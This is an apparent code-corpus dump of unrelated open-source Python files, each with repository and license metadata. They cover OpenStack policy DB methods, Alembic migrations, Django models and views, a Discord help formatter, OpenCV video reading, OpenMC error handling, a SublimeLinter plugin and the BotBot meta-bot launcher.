@log.log
def update_policy_target_group(self, context, policy_target_group_id,
policy_target_group):
ptg = policy_target_group['policy_target_group']
with context.session.begin(subtransactions=True):
ptg_db = self._get_policy_target_group(
context, policy_target_group_id)
self._process_policy_rule_sets_for_ptg(context, ptg_db, ptg)
if 'subnets' in ptg:
# Add/remove associations for changes in subnets.
new_subnets = set(ptg['subnets'])
old_subnets = set(subnet.subnet_id
for subnet in ptg_db.subnets)
for subnet in new_subnets - old_subnets:
assoc = PTGToSubnetAssociation(
policy_target_group_id=policy_target_group_id,
subnet_id=subnet)
ptg_db.subnets.append(assoc)
for subnet in old_subnets - new_subnets:
assoc = (
context.session.query(
PTGToSubnetAssociation).filter_by(
policy_target_group_id=policy_target_group_id,
subnet_id=subnet).one())
ptg_db.subnets.remove(assoc)
context.session.delete(assoc)
# Don't update ptg_db.subnets with subnet IDs.
del ptg['subnets']
ptg_db.update(ptg)
return self._make_policy_target_group_dict(ptg_db)
@log.log
def create_l2_policy(self, context, l2_policy):
l2p = l2_policy['l2_policy']
tenant_id = self._get_tenant_id_for_create(context, l2p)
with context.session.begin(subtransactions=True):
l2p_db = L2PolicyMapping(id=uuidutils.generate_uuid(),
tenant_id=tenant_id,
name=l2p['name'],
description=l2p['description'],
l3_policy_id=l2p['l3_policy_id'],
network_id=l2p['network_id'],
shared=l2p.get('shared', False))
context.session.add(l2p_db)
return self._make_l2_policy_dict(l2p_db)
@log.log
def get_l2_policies(self, context, filters=None, fields=None,
sorts=None, limit=None, marker=None,
page_reverse=False):
marker_obj = self._get_marker_obj(context, 'l2_policy', limit,
marker)
return self._get_collection(context, L2PolicyMapping,
self._make_l2_policy_dict,
filters=filters, fields=fields,
sorts=sorts, limit=limit,
marker_obj=marker_obj,
page_reverse=page_reverse)
@log.log
def create_l3_policy(self, context, l3_policy):
l3p = l3_policy['l3_policy']
self.validate_ip_pool(l3p.get('ip_pool', None), l3p['ip_version'])
tenant_id = self._get_tenant_id_for_create(context, l3p)
self.validate_subnet_prefix_length(l3p['ip_version'],
l3p['subnet_prefix_length'],
l3p.get('ip_pool', None))
with context.session.begin(subtransactions=True):
l3p_db = L3PolicyMapping(id=uuidutils.generate_uuid(),
tenant_id=tenant_id,
name=l3p['name'],
ip_version=l3p['ip_version'],
ip_pool=l3p['ip_pool'],
subnet_prefix_length=
l3p['subnet_prefix_length'],
description=l3p['description'],
shared=l3p.get('shared', False))
if 'routers' in l3p:
for router in l3p['routers']:
assoc = L3PolicyRouterAssociation(
l3_policy_id=l3p_db.id,
router_id=router
)
l3p_db.routers.append(assoc)
if 'external_segments' in l3p:
self._set_ess_for_l3p(context, l3p_db,
l3p['external_segments'])
context.session.add(l3p_db)
return self._make_l3_policy_dict(l3p_db)
@log.log
def update_l3_policy(self, context, l3_policy_id, l3_policy):
l3p = l3_policy['l3_policy']
with context.session.begin(subtransactions=True):
l3p_db = self._get_l3_policy(context, l3_policy_id)
if 'subnet_prefix_length' in l3p:
self.validate_subnet_prefix_length(l3p_db.ip_version,
l3p['subnet_prefix_length'],
l3p_db.ip_pool)
if 'routers' in l3p:
# Add/remove associations for changes in routers.
new_routers = set(l3p['routers'])
old_routers = set(router.router_id
for router in l3p_db.routers)
for router in new_routers - old_routers:
assoc = L3PolicyRouterAssociation(
l3_policy_id=l3_policy_id, router_id=router)
l3p_db.routers.append(assoc)
for router in old_routers - new_routers:
assoc = (context.session.query(L3PolicyRouterAssociation).
filter_by(l3_policy_id=l3_policy_id,
router_id=router).
one())
l3p_db.routers.remove(assoc)
context.session.delete(assoc)
# Don't update l3p_db.routers with router IDs.
del l3p['routers']
if 'external_segments' in l3p:
self._set_ess_for_l3p(context, l3p_db,
l3p['external_segments'])
del l3p['external_segments']
l3p_db.update(l3p)
return self._make_l3_policy_dict(l3p_db)
@log.log
def create_external_segment(self, context, external_segment):
es = external_segment['external_segment']
tenant_id = self._get_tenant_id_for_create(context, es)
with context.session.begin(subtransactions=True):
es_db = ExternalSegmentMapping(
id=uuidutils.generate_uuid(), tenant_id=tenant_id,
name=es['name'], description=es['description'],
shared=es.get('shared', False), ip_version=es['ip_version'],
cidr=es['cidr'],
port_address_translation=es['port_address_translation'],
subnet_id=es['subnet_id'])
context.session.add(es_db)
if 'external_routes' in es:
self._process_segment_ers(context, es_db, es)
return self._make_external_segment_dict(es_db)
@log.log
def get_external_segments(self, context, filters=None, fields=None,
sorts=None, limit=None, marker=None,
page_reverse=False):
marker_obj = self._get_marker_obj(context, 'external_segment', limit,
marker)
return self._get_collection(context, ExternalSegmentMapping,
self._make_external_segment_dict,
filters=filters, fields=fields,
sorts=sorts, limit=limit,
marker_obj=marker_obj,
page_reverse=page_reverse)
|
apache-2.0
| 7,347,120,841,103,044,000
| 47.142105
| 79
| 0.552586
| false
| 3.970914
| false
| false
| false
|
uwcirg/true_nth_usa_portal
|
portal/migrations/versions/4456ad5faf86_.py
|
1
|
2041
|
"""empty message
Revision ID: 4456ad5faf86
Revises: 521aa70e0617
Create Date: 2015-09-03 19:40:53.744703
"""
# revision identifiers, used by Alembic.
revision = '4456ad5faf86'
down_revision = '521aa70e0617'
from alembic import op
import sqlalchemy as sa
def upgrade():
### commands auto generated by Alembic - please adjust! ###
op.create_table('roles',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('name', sa.String(length=50), nullable=True),
sa.PrimaryKeyConstraint('id'),
sa.UniqueConstraint('name')
)
op.create_table('user_roles',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('user_id', sa.Integer(), nullable=True),
sa.Column('role_id', sa.Integer(), nullable=True),
sa.ForeignKeyConstraint(
['role_id'], ['roles.id'], ondelete='CASCADE'),
sa.ForeignKeyConstraint(
['user_id'], ['users.id'], ondelete='CASCADE'),
sa.PrimaryKeyConstraint('id')
)
op.add_column(u'users', sa.Column(
'confirmed_at', sa.DateTime(), nullable=True))
op.add_column(u'users', sa.Column('is_active', sa.Boolean(),
server_default='1', nullable=False))
op.add_column(u'users', sa.Column(
'password', sa.String(length=255), nullable=True))
op.add_column(u'users', sa.Column('reset_password_token',
sa.String(length=100), nullable=True))
### end Alembic commands ###
def downgrade():
### commands auto generated by Alembic - please adjust! ###
op.drop_column(u'users', 'reset_password_token')
op.drop_column(u'users', 'password')
op.drop_column(u'users', 'is_active')
op.drop_column(u'users', 'confirmed_at')
op.drop_table('user_roles')
op.drop_table('roles')
### end Alembic commands ###
|
bsd-3-clause
| 5,831,843,187,538,724,000
| 36.796296
| 76
| 0.55757
| false
| 3.829268
| false
| false
| false
|
Sult/evetool
|
populate/misc.py
|
1
|
1848
|
import eveapi
from apies.models import CallGroup, Call, Api
from characters.models import RefType
api = eveapi.EVEAPIConnection()
data = api.API.CallList()
def call_groups():
for group in data.callGroups:
try:
CallGroup.objects.create(
groupid=group.groupID,
name=group.name,
description=group.description,
)
except:
print "You stupid"
def calls():
for call in data.calls:
if call.accessMask == 8388608:
#no need for limited character info. Or full acces or none
continue
try:
Call.objects.create(
accessmask=call.accessMask,
accounttype=call.type,
name=call.name,
callgroup=CallGroup.objects.get(groupid=call.groupID),
description=call.description,
)
except:
print "Some shit didnt work dude"
# extra = []
# for call in extra:
# Call.objects.create(
# accessmask=call.accessMask,
# accounttype=Api.CHARACTER,
# name=call.name,
# callgroup=CallGroup.objects.get(groupid=call.groupID),
# description=call.description,
# )
# Call.objects.create(
# accessmask=call.accessMask,
# accounttype=Api.CORPORATION,
# name=call.name,
# callgroup=CallGroup.objects.get(groupid=call.groupID),
# description=call.description,
# )
def reftypes():
for ref in api.eve.RefTypes().refTypes:
try:
RefType.objects.create(
reftypeid=ref.refTypeID,
reftypename=ref.refTypeName,
)
except:
"You fucked up mate"
call_groups()
calls()
reftypes()
|
mit
| 1,425,303,682,853,979,000
| 26.58209
| 70
| 0.551407
| false
| 3.948718
| false
| false
| false
|
EJH2/ViralBot-Discord
|
bot/utils/over.py
|
1
|
7167
|
# coding=utf-8
"""Overrides for Discord.py classes"""
import contextlib
import inspect
import io
import itertools
import re
import discord
from discord.ext.commands import HelpFormatter as HelpF, Paginator, Command
from bot.utils import polr, privatebin
from bot.utils.args import ArgParseConverter as ArgPC
def create_help(cmd, parser):
"""Creates an updated usage for the help command"""
default = cmd.params['args'].default
if cmd.signature.split("[")[-1] == f"args={default}]" if default else "args]":
sio = io.StringIO()
with contextlib.redirect_stdout(sio):
parser.print_help()
sio.seek(0)
s = sio.read()
# Strip the filename and trailing newline from help text
arg_part = s[(len(str(s[7:]).split()[0]) + 8):-1]
k = cmd.qualified_name
spt = len(k.split())
# Remove a duplicate command name + leading arguments
split_sig = cmd.signature.split()[spt:]
return "[".join((" ".join(split_sig)).split("[")[:-1]) + arg_part
return cmd.usage
class HelpFormatter(HelpF):
"""Custom override for the default help command"""
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self._paginator = None
async def format(self):
"""Handles the actual behaviour involved with formatting.
To change the behaviour, this method should be overridden.
Returns
--------
list
A paginated output of the help command.
"""
self._paginator = Paginator()
# we need a padding of ~80 or so
description = self.command.description if not self.is_cog() else inspect.getdoc(self.command)
if description:
# <description> portion
self._paginator.add_line(description, empty=True)
if isinstance(self.command, Command):
# <signature portion>
if self.command.params.get("args", None) and type(self.command.params['args'].annotation) == ArgPC:
self.command.usage = create_help(self.command, self.command.params['args'].annotation.parser)
signature = self.get_command_signature()
self._paginator.add_line(signature, empty=True)
# <long doc> section
if self.command.help:
self._paginator.add_line(self.command.help, empty=True)
# end it here if it's just a regular command
if not self.has_subcommands():
self._paginator.close_page()
return self._paginator.pages
max_width = self.max_name_size
def category(tup):
"""Splits the help command into categories for easier readability"""
cog = tup[1].cog_name
# we insert the zero width space there to give it approximate
# last place sorting position.
return cog + ':' if cog is not None else '\u200bNo Category:'
filtered = await self.filter_command_list()
if self.is_bot():
data = sorted(filtered, key=category)
for category, commands in itertools.groupby(data, key=category):
# there simply is no prettier way of doing this.
commands = sorted(commands)
if len(commands) > 0:
self._paginator.add_line(category)
self._add_subcommands_to_page(max_width, commands)
else:
filtered = sorted(filtered)
if filtered:
self._paginator.add_line('Commands:')
self._add_subcommands_to_page(max_width, filtered)
# add the ending note
self._paginator.add_line()
ending_note = self.get_ending_note()
self._paginator.add_line(ending_note)
return self._paginator.pages
_mentions_transforms = {
'@everyone': '@\u200beveryone',
'@here': '@\u200bhere'
}
_mention_pattern = re.compile('|'.join(_mentions_transforms.keys()))
def _is_submodule(parent, child):
return parent == child or child.startswith(parent + ".")
async def _default_help_command(ctx, *commands: str):
"""Shows this message."""
bot = ctx.bot
destination = ctx.message.author if bot.pm_help else ctx.message.channel
def repl(obj):
return _mentions_transforms.get(obj.group(0), '')
# help by itself just lists our own commands.
if len(commands) == 0:
pages = await bot.formatter.format_help_for(ctx, bot)
elif len(commands) == 1:
# try to see if it is a cog name
name = _mention_pattern.sub(repl, commands[0])
command = None
if name in bot.cogs:
command = bot.cogs[name]
else:
command = bot.all_commands.get(name)
if command is None:
await destination.send(bot.command_not_found.format(name))
return
pages = await bot.formatter.format_help_for(ctx, command)
else:
name = _mention_pattern.sub(repl, commands[0])
command = bot.all_commands.get(name)
if command is None:
await destination.send(bot.command_not_found.format(name))
return
for key in commands[1:]:
try:
key = _mention_pattern.sub(repl, key)
command = command.all_commands.get(key)
if command is None:
await destination.send(bot.command_not_found.format(key))
return
except AttributeError:
await destination.send(bot.command_has_no_subcommands.format(command, key))
return
pages = await bot.formatter.format_help_for(ctx, command)
if bot.pm_help is None:
characters = sum(map(len, pages))
# modify destination based on length of pages.
if characters > 1000:
destination = ctx.message.author
for page in pages:
try:
await destination.send(page)
except discord.Forbidden:
destination = ctx.message.channel
await destination.send(page)
old_send = discord.abc.Messageable.send
async def send(self, content=None, **kwargs):
"""Overrides default send method in order to create a paste if the response is more than 2000 characters"""
if content is not None and any(x in str(content) for x in ["@everyone", "@here"]):
content = content.replace("@everyone", "@\u0435veryone").replace("@here", "@h\u0435re")
if content is not None and len(str(content)) > 2000:
if content.startswith("```py"):
content = "\n".join(content.split("\n")[1:-1])
paste = await privatebin.upload(content, expires="15min", server=self.bot.priv)
if self.bot.polr:
paste = await polr.shorten(paste, **self.bot.polr)
return await old_send(self, f"Hey, I couldn't handle all the text I was gonna send you, so I put it in a paste!"
f"\nThe link is **{paste}**, but it expires in 15 minutes, so get it quick!",
**kwargs)
else:
return await old_send(self, content, **kwargs)
|
gpl-3.0
| 2,864,970,659,438,636,000
| 35.380711
| 120
| 0.596205
| false
| 4.090753
| false
| false
| false
|
makelove/OpenCV-Python-Tutorial
|
ch05-视频/5.VideoPlay.py
|
1
|
1329
|
import numpy as np
import cv2
cap = cv2.VideoCapture('../data/vtest.avi')
# cap = cv2.VideoCapture('output.avi')
# cap = cv2.VideoCapture('Minions_banana.mp4')
# 帧率
fps = cap.get(cv2.CAP_PROP_FPS) # 25.0
print("Frames per second using video.get(cv2.CAP_PROP_FPS) : {0}".format(fps))
# 总共有多少帧
num_frames = cap.get(cv2.CAP_PROP_FRAME_COUNT)
print('共有', num_frames, '帧')
#
frame_height = cap.get(cv2.CAP_PROP_FRAME_HEIGHT)
frame_width = cap.get(cv2.CAP_PROP_FRAME_WIDTH)
print('高:', frame_height, '宽:', frame_width)
FRAME_NOW = cap.get(cv2.CAP_PROP_POS_FRAMES) # 第0帧
print('当前帧数', FRAME_NOW) # 当前帧数 0.0
# 读取指定帧,对视频文件才有效,对摄像头无效??
frame_no = 121
cap.set(1, frame_no) # Where frame_no is the frame you want
ret, frame = cap.read() # Read the frame
cv2.imshow('frame_no'+str(frame_no), frame)
FRAME_NOW = cap.get(cv2.CAP_PROP_POS_FRAMES)
print('当前帧数', FRAME_NOW) # 当前帧数 122.0
while cap.isOpened():
ret, frame = cap.read()
FRAME_NOW = cap.get(cv2.CAP_PROP_POS_FRAMES) # 当前帧数
print('当前帧数', FRAME_NOW)
gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
cv2.imshow('frame', gray)
key = cv2.waitKey(1)
if key == ord("q"):
break
cap.release()
cv2.destroyAllWindows()
|
mit
| 7,165,087,056,115,826,000
| 25.733333
| 78
| 0.666667
| false
| 2.110526
| false
| false
| false
|
ziima/pyvmd
|
pyvmd/tests/test_analyzer.py
|
1
|
2785
|
"""
Tests for trajectory analysis utilities.
"""
import VMD
from mock import sentinel
from pyvmd.analyzer import Analyzer
from pyvmd.molecules import Molecule
from .utils import data, PyvmdTestCase
class TestAnalyzer(PyvmdTestCase):
"""
Test `Analyzer` class.
"""
def setUp(self):
self.mol = Molecule.create()
self.mol.load(data('water.psf'))
# Storage for callback data
self.coords = []
self.frames = []
def test_analyze_callback_args(self):
# Test callback is called with extra arguments
steps = []
def callback(step, *args, **kwargs):
self.assertEqual(step.molecule, self.mol)
self.assertEqual(args, (sentinel.arg1, sentinel.arg2))
self.assertEqual(kwargs, {'key': sentinel.value, 'another': sentinel.junk})
steps.append(step.frame)
analyzer = Analyzer(self.mol, [data('water.1.dcd')])
analyzer.add_callback(callback, sentinel.arg1, sentinel.arg2, key=sentinel.value, another=sentinel.junk)
analyzer.analyze()
self.assertEqual(steps, range(12))
def _get_status(self, status):
# Callback to collect status data
self.frames.append(status.frame)
def _get_x(self, status):
# Callback to collect data
self.coords.append(VMD.atomsel.atomsel('index 0', molid=status.molecule.molid).get('x')[0])
def test_analyze(self):
# Test analyzer works correctly with default parameters
analyzer = Analyzer(self.mol, [data('water.1.dcd'), data('water.2.dcd')])
analyzer.add_callback(self._get_status)
analyzer.add_callback(self._get_x)
analyzer.analyze()
result = [-1.4911567, -1.4851371, -1.4858487, -1.4773947, -1.4746015, -1.4673382, -1.4535547, -1.4307435,
-1.4120502, -1.3853478, -1.3674825, -1.3421925, -1.3177859, -1.2816998, -1.2579591, -1.2262495,
-1.2036057, -1.1834533, -1.174916, -1.1693807, -1.1705244, -1.1722997, -1.1759951, -1.175245]
self.assertAlmostEqualSeqs(self.coords, result)
self.assertEqual(self.frames, range(24))
def test_analyze_params(self):
# Test load every other frame, all 12 at once
self.coords = []
self.frames = []
analyzer = Analyzer(self.mol, [data('water.1.dcd'), data('water.2.dcd')], step=2, chunk=12)
analyzer.add_callback(self._get_status)
analyzer.add_callback(self._get_x)
analyzer.analyze()
result = [-1.4911567, -1.4858487, -1.4746015, -1.4535547, -1.4120502, -1.3674825, -1.3177859, -1.2579591,
-1.2036057, -1.174916, -1.1705244, -1.1759951]
self.assertAlmostEqualSeqs(self.coords, result)
self.assertEqual(self.frames, range(12))
|
gpl-3.0
| 6,988,987,339,418,595,000
| 38.225352
| 113
| 0.627289
| false
| 3.234611
| true
| false
| false
|
mercycorps/tola
|
htdocs/silo/serializers.py
|
1
|
1231
|
from django.forms import widgets
from rest_framework import serializers
from silo.models import Silo, Read, ReadType, LabelValueStore, Tag
from django.contrib.auth.models import User
import json
class SiloSerializer(serializers.HyperlinkedModelSerializer):
data = serializers.SerializerMethodField()
class Meta:
model = Silo
fields = ('owner', 'name', 'reads', 'description', 'create_date', 'id', 'data','shared','tags','public')
depth =1
def get_data(self, obj):
link = "/api/silo/" + str(obj.id) + "/data/"
return (self.context['request'].build_absolute_uri(link))
class TagSerializer(serializers.HyperlinkedModelSerializer):
class Meta:
model = Tag
fields = ('name', 'owner')
class UserSerializer(serializers.HyperlinkedModelSerializer):
class Meta:
model = User
fields = ('url', 'username', 'email', 'is_staff')
class ReadSerializer(serializers.HyperlinkedModelSerializer):
class Meta:
model = Read
fields = ('owner', 'type', 'read_name', 'read_url')
class ReadTypeSerializer(serializers.HyperlinkedModelSerializer):
class Meta:
model = ReadType
fields = ( 'read_type', 'description')
|
gpl-2.0
| -2,326,723,832,163,240,000
| 29.04878
| 112
| 0.671812
| false
| 4.036066
| false
| false
| false
|
eighilaza/bouraka
|
bouraka-django/bouraka/views.py
|
1
|
1815
|
from django.shortcuts import render, get_object_or_404
from django.http import HttpResponse
from django.template import RequestContext, loader
from news.models import News
from slides.models import Slide
from django.http import HttpResponseRedirect
def home(request):
latest_news_list = News.objects.order_by('-publication_date')[:4]
try:
slide = Slide.objects.get(title='home')
except Slide.DoesNotExist:
slide = None
template = loader.get_template('bouraka/home.html')
context = {
'latest_news_list': latest_news_list,
'slide': slide,
}
return render(request, 'bouraka/home.html', context)
def gallery(request):
return render(request, 'bouraka/gallery.html')
def history(request):
return render(request, 'bouraka/history.html')
def team(request):
return render(request, 'bouraka/team.html')
def shell(request):
return render(request, 'bouraka/shell.html')
def educeco(request):
return render(request, 'bouraka/educeco.html')
def michelin(request):
return render(request, 'bouraka/michelin.html')
def futur(request):
return render(request, 'bouraka/futur.html')
def envol(request):
return render(request, 'bouraka/envol.html')
def epic(request):
return render(request, 'bouraka/epic.html')
def orca(request):
return render(request, 'bouraka/orca.html')
def elec(request):
return render(request, 'bouraka/elec.html')
def roues(request):
return render(request, 'bouraka/roues.html')
def moteur(request):
return render(request, 'bouraka/moteur.html')
def simulateur(request):
return render(request, 'bouraka/simulateur.html')
def accomplishments(request):
return render(request, 'bouraka/accomplishments.html')
def contacts(request):
return render(request, 'bouraka/contacts.html')
|
lgpl-3.0
| -63,468,116,221,537,944
| 33.903846
| 69
| 0.722865
| false
| 3.336397
| false
| false
| false
|
beakman/caquitv
|
external_apps/djangoratings/models.py
|
1
|
2158
|
from django.db import models
from django.contrib.contenttypes.models import ContentType
from django.contrib.contenttypes import generic
from django.contrib.auth.models import User
import datetime
from managers import VoteManager
class Vote(models.Model):
content_type = models.ForeignKey(ContentType, related_name="votes")
object_id = models.PositiveIntegerField()
key = models.CharField(max_length=32)
score = models.IntegerField()
user = models.ForeignKey(User, blank=True, null=True, related_name="votes")
ip_address = models.IPAddressField()
date_added = models.DateTimeField(default=datetime.datetime.now, editable=False)
date_changed = models.DateTimeField(default=datetime.datetime.now, editable=False)
objects = VoteManager()
content_object = generic.GenericForeignKey()
class Meta:
unique_together = (('content_type', 'object_id', 'key', 'user', 'ip_address'))
def __unicode__(self):
return "%s voted %s on %s" % (self.user_display, self.score, self.content_object)
def save(self, *args, **kwargs):
self.date_changed = datetime.datetime.now()
super(Vote, self).save(*args, **kwargs)
def user_display(self):
if self.user:
return "%s (%s)" % (self.user.username, self.ip_address)
return self.ip_address
user_display = property(user_display)
def partial_ip_address(self):
ip = self.ip_address.split('.')
ip[-1] = 'xxx'
return '.'.join(ip)
partial_ip_address = property(partial_ip_address)
class Score(models.Model):
content_type = models.ForeignKey(ContentType)
object_id = models.PositiveIntegerField()
key = models.CharField(max_length=32)
score = models.IntegerField()
votes = models.PositiveIntegerField()
content_object = generic.GenericForeignKey()
class Meta:
unique_together = (('content_type', 'object_id', 'key'),)
def __unicode__(self):
return "%s scored %s with %s votes" % (self.content_object, self.score, self.votes)
|
agpl-3.0
| -277,736,686,817,290,900
| 35.576271
| 91
| 0.645042
| false
| 3.90942
| false
| false
| false
|
alexbiehl/SublimeLinter-stack-ghc
|
linter.py
|
1
|
1410
|
#
# linter.py
# Linter for SublimeLinter3, a code checking framework for Sublime Text 3
#
# Written by Jon Surrell
# Copyright (c) 2013 Jon Surrell
#
# License: MIT
#
"""This module exports the Stack Ghc plugin class."""
from SublimeLinter.lint import Linter, util
from os.path import basename
class StackGhc(Linter):
"""Provides an interface to stack ghc."""
syntax = ('haskell', 'haskell-sublimehaskell', 'literate haskell')
cmd = ('stack', 'ghc', '--', '-fno-code', '-Wall', '-Wwarn', '-fno-helpful-errors')
regex = (
r'^(?P<filename>.+):'
r'(?P<line>\d+):(?P<col>\d+):'
r'\s+(?P<warning>Warning:\s+)?(?P<message>.+)$'
)
multiline = True
# No stdin
tempfile_suffix = {
'haskell': 'hs',
'haskell-sublimehaskell': 'hs',
'literate haskell': 'lhs'
}
# ghc writes errors to STDERR
error_stream = util.STREAM_STDERR
def split_match(self, match):
"""Override to ignore errors reported in imported files."""
match, line, col, error, warning, message, near = (
super().split_match(match)
)
match_filename = basename(match.groupdict()['filename'])
linted_filename = basename(self.filename)
if match_filename != linted_filename:
return None, None, None, None, None, '', None
return match, line, col, error, warning, message, near
|
mit
| -9,104,684,087,554,022,000
| 26.115385
| 87
| 0.600709
| false
| 3.414044
| false
| false
| false
|
walshjon/openmc
|
openmc/capi/error.py
|
1
|
1950
|
from ctypes import c_int, c_char
from warnings import warn
from . import _dll
class OpenMCError(Exception):
"""Root exception class for OpenMC."""
class GeometryError(OpenMCError):
"""Geometry-related error"""
class InvalidIDError(OpenMCError):
"""Use of an ID that is invalid."""
class AllocationError(OpenMCError):
"""Error related to memory allocation."""
class OutOfBoundsError(OpenMCError):
"""Index in array out of bounds."""
class DataError(OpenMCError):
"""Error relating to nuclear data."""
class PhysicsError(OpenMCError):
"""Error relating to performing physics."""
class InvalidArgumentError(OpenMCError):
"""Argument passed was invalid."""
class InvalidTypeError(OpenMCError):
"""Tried to perform an operation on the wrong type."""
def _error_handler(err, func, args):
"""Raise exception according to error code."""
# Get error code corresponding to global constant.
def errcode(s):
return c_int.in_dll(_dll, s).value
# Get error message set by OpenMC library
errmsg = (c_char*256).in_dll(_dll, 'openmc_err_msg')
msg = errmsg.value.decode()
# Raise exception type corresponding to error code
if err == errcode('e_allocate'):
raise AllocationError(msg)
elif err == errcode('e_out_of_bounds'):
raise OutOfBoundsError(msg)
elif err == errcode('e_invalid_argument'):
raise InvalidArgumentError(msg)
elif err == errcode('e_invalid_type'):
raise InvalidTypeError(msg)
if err == errcode('e_invalid_id'):
raise InvalidIDError(msg)
elif err == errcode('e_geometry'):
raise GeometryError(msg)
elif err == errcode('e_data'):
raise DataError(msg)
elif err == errcode('e_physics'):
raise PhysicsError(msg)
elif err == errcode('e_warning'):
warn(msg)
elif err < 0:
raise OpenMCError("Unknown error encountered (code {}).".format(err))
|
mit
| 8,463,138,787,818,959,000
| 25.351351
| 77
| 0.663077
| false
| 3.931452
| false
| false
| false
|
vivaxy/algorithms
|
python/problems/validate_stack_sequences.py
|
1
|
1434
|
"""
https://leetcode.com/problems/validate-stack-sequences/
https://leetcode.com/submissions/detail/218117451/
"""
from typing import List
class Solution:
def validateStackSequences(self, pushed: List[int], popped: List[int]) -> bool:
if pushed == popped:
return True
a = []
while len(pushed):
if len(a) == 0:
a.append(pushed.pop(0))
if popped[0] != a[-1]:
a.append(pushed.pop(0))
else:
popped.pop(0)
a.pop()
if len(a) != len(popped):
return False
while len(a):
if a.pop() != popped.pop(0):
return False
return True
import unittest
class Test(unittest.TestCase):
def test(self):
solution = Solution()
self.assertEqual(solution.validateStackSequences(
[1, 2, 3, 4, 5],
[4, 5, 3, 2, 1]), True)
self.assertEqual(solution.validateStackSequences(
[1, 2, 3, 4, 5],
[4, 3, 5, 1, 2]), False)
self.assertEqual(solution.validateStackSequences(
[],
[]), True)
self.assertEqual(solution.validateStackSequences(
[1, 0],
[1, 0]), True)
self.assertEqual(solution.validateStackSequences(
[0, 2, 1],
[0, 1, 2]), True)
if __name__ == '__main__':
unittest.main()
|
mit
| 2,056,916,776,801,924,600
| 25.072727
| 83
| 0.505579
| false
| 3.695876
| true
| false
| false
|
ojousima/asylum
|
project/ndaparser/admin.py
|
1
|
2753
|
from django.contrib import admin
from django.core.exceptions import PermissionDenied, ImproperlyConfigured
from django.conf.urls import url
from django.core.urlresolvers import reverse
from django.utils.translation import ugettext_lazy as _
from django.shortcuts import get_object_or_404, render
from django.utils.text import capfirst
from django.conf import settings
from .views import NordeaUploadView
from creditor.admin import TransactionAdmin
from creditor.handlers import AbstractTransaction
from asylum.utils import get_handler_instance
class NordeaUploadMixin(object):
nda_change_list_template = "ndaparser/admin/change_list.html"
view_class = NordeaUploadView
def get_urls(self):
"""Returns the additional urls used by the uploader."""
urls = super().get_urls()
admin_site = self.admin_site
opts = self.model._meta
info = opts.app_label, opts.model_name,
my_urls = [
url("^nordea/upload/$", admin_site.admin_view(self.upload_view), name='%s_%s_ndaupload' % info),
]
return my_urls + urls
def upload_view(self, request, extra_context=None):
"""Displays a form that can upload transactions form a Nordea "NDA" transaction file."""
# The revisionform view will check for change permission (via changeform_view),
# but we also need to check for add permissions here.
if not self.has_add_permission(request): # pragma: no cover
raise PermissionDenied
model = self.model
opts = model._meta
try:
each_context = self.admin_site.each_context(request)
except TypeError: # Django <= 1.7 pragma: no cover
each_context = self.admin_site.each_context()
# Get the rest of the context.
context = dict(
each_context,
opts = opts,
app_label = opts.app_label,
module_name = capfirst(opts.verbose_name),
title = _("Upload Nordea transactions"),
transactions_handler = get_handler_instance('TRANSACTION_CALLBACKS_HANDLER')
)
context.update(extra_context or {})
view = self.view_class.as_view()
return view(request, context=context)
def changelist_view(self, request, extra_context=None):
context = dict(
orig_template = str(getattr(super(), 'change_list_template')),
)
context.update(extra_context or {})
self.change_list_template = self.nda_change_list_template
return super().changelist_view(request, context)
if settings.NORDEA_UPLOAD_ENABLED:
# Dynamically inject the mixin to transactions admin
TransactionAdmin.__bases__ = (NordeaUploadMixin, ) + TransactionAdmin.__bases__
|
mit
| 8,746,984,828,914,234,000
| 40.712121
| 108
| 0.668362
| false
| 4.102832
| false
| false
| false
|
ArkaneMoose/BotBot
|
botbot/main.py
|
1
|
3722
|
import sys
import re
import json
import argparse
import euphoria as eu
from .botbot import BotBot
from . import euphutils
from . import snapshot
room_name = 'testing'
password = None
nickname = 'BotBot'
help_text = '''\
@BotBot is a bot for Euphoria created by @myhandsaretypingwords that creates
other bots.
Usage
================================================================================
Create a bot with @BotName with some code.
!createbot @BotName CODE
Same as the previous but specify the room to put the bot in.
!createbot &room @BotName CODE
List all the bots that are currently running and have been created by @BotBot.
!list @BotBot
Send a bot with the name @BotName to the specified room.
!sendbot &room @BotName
Kill a bot with the name @BotName.
!kill @BotName
Pause a bot with the name @BotName.
!pause @BotName
Kill all the bots created by @BotBot.
!killall @BotName
Take a snapshot of the state of @BotBot.
!save @BotBot
Load the latest snapshot.
!load @BotBot latest
Load a snapshot with a specific file name.
!load @BotBot FILENAME
Restart @BotBot.
!restart @BotBot
More Info
================================================================================
View the @BotBot wiki at https://github.com/ArkaneMoose/BotBot/wiki for a
comprehensive guide on how to use @BotBot, including a guide on how to write
@BotBot code and a list of features and restrictions that bots created with
@BotBot have.
Good luck!
================================================================================
Good luck on your journey to becoming a bot programmer.
If you need help, you can ask @myhandsaretypingwords, @nihizg, or any of the
other awesome Euphorians in &programming for help with any bot-related questions.
Have fun, and please be respectful!
@BotBot is open-source! Feel free to view the code, contribute, and report
issues at https://github.com/ArkaneMoose/BotBot.
@BotBot complies with the Euphorian bot standards.\
'''
short_help_text = '''\
@BotBot is a bot for Euphoria created by @myhandsaretypingwords that creates
other bots. Type "!help @BotBot" to learn more.\
'''
def main():
botbot = BotBot(room_name, password, nickname, help_text, short_help_text)
eu.executable.start(botbot)
def get_args():
parser = argparse.ArgumentParser(prog='botbot', description='A meta-bot for Euphoria.', epilog='For details, read the README.md file at https://github.com/ArkaneMoose/BotBot/blob/master/README.md')
parser.add_argument('config-file', nargs='?', help='optional path to a JSON configuration file')
parser.add_argument('-r', '--room', help='room in Euphoria where @BotBot should reside')
parser.add_argument('-p', '--password', help='password for room if necessary')
parser.add_argument('-n', '--nickname', help='custom nickname for @BotBot')
parser.add_argument('-s', '--snapshot-dir', help='directory where snapshots will be read and written')
return parser.parse_args()
if __name__ == '__main__':
args = vars(get_args())
if args.get('config-file'):
with open(args.get('config-file')) as f:
config = json.load(f)
else:
config = {}
room_name = args['room'] or config.get('room', room_name)
password = args['password'] or config.get('password', password)
nickname = args['nickname'] or config.get('nickname', nickname)
help_text = config.get('helpText', help_text.replace('@BotBot', euphutils.mention(nickname)))
short_help_text = config.get('shortHelpText', short_help_text.replace('@BotBot', euphutils.mention(nickname)))
